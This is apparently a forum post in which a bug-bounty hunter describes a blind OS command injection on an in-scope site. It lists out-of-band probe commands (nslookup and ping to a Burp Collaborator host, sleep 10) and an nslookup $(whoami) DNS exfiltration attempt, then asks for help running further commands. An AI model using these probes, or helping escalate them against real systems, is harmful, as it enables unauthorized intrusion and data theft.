14Ara
out-of-band data exfiltration Command Injection
A few days ago I found a vulnerability in a site of scope using the Burp suite scanner with the command nslookup xxx.burpcolaborator.com exploit with the following feature:
Issue: OS command injection
Severity: High
Confidence: Certain
the vulnerability only responds when using "`" and only responds to the nslookup, sleep and ping binaries including the Burp collaborator.
These are the only commands it responds to:
nslookup xxx.burpcolaborator.com
ping xxx.burpcolaborator.com
sleep 10
other commands like nslookup $(whoami).xxx.burp collaborator.com do not give any answer, please I would appreciate it if you could help me with this problem, since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.
